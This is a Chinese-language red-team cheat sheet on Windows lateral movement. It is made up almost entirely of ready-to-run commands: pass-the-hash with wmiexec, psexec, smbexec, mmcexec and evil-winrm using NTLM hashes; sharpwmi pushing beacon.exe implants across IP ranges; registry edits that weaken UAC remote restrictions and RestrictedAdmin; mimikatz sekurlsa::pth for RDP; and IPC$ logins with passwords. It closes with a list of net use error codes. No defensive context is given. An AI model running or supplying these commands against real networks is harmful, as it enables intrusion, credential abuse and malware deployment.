红队技术-各端口横向移动方法

python wmiexec.py -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220
wmiexec.exe -hashes :2687cb433215956d4ededb0d00334118 Tom@192.168.0.220

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

cscript WMIHACKER_0.6.vbs /cmd 10.10.10.10 administrator "123456" "ipconfig" 1

sharpwmi.exe login 192.168.2.3 administrator 123 cmd whoami
sharpwmi.exe login 192.168.2.3/24 administrator 123 cmd whoami
sharpwmi.exe login 192.168.2.3-23 administrator 123 upload beacon.exe c:\beacon.exe
sharpwmi.exe pth 192.168.2.3-192.168.2.77 cmd whoami
sharpwmi.exe pth 192.168.2.3/255.255.255.0 upload beacon.exe c:\beacon.exe

smbexec.exe administrator:"mima"@10.61.9.46

net use \\10.61.9.45\ipc$ "Yy@2019&03Gf" /user:administrator
psexec.exe \\10.61.9.45 -u administrator -p "mima" whoami

python psexec.py -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100
psexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100

mmcexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 administrator@192.168.0.100

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

privilege::debug
sekurlsa::pth /user:dyy /domain:. /ntlm::2687cb433215956d4ededb0d00334118 "/run:mstsc.exe /restrictedadmin"

gem install evil-winrm

evil-winrm -i 192.168.0.100 -u administrator -H ccef208c6485269c20db2cad21734fe7

错误号5，拒绝访问：很可能你使⽤的⽤户不是管理员权限的（#先提升权限）
错误号51，Windows⽆法找到⽹络路径（#⽹络有问题）
错误号53，找不到⽹络路径:ip地址错误;⽬标末开机（#⽬标lanmanserver服务未启动；⽬标有
防⽕墙（端⼝过滤）
错误号67，找不到⽹络名（#你的lanmanworkstation服务末启动;⽬标删除了ipc$）
错误号1219，提供的凭据与⼰存在的凭据集冲突（#你已经和对⽅建⽴了⼀个ipc$，请删除在连）
错误号1326，未知的⽤户名或错误密码（#原因很明显）
错误号1792，试图登录，但是⽹络登录服务没有启动（#⽬标NetLogon服务末启动。（连接域控
会出现此情况）
错误号2242，此⽤户的密码⼰经过期（#⽬标有帐号策略，强制定期要求更改密码）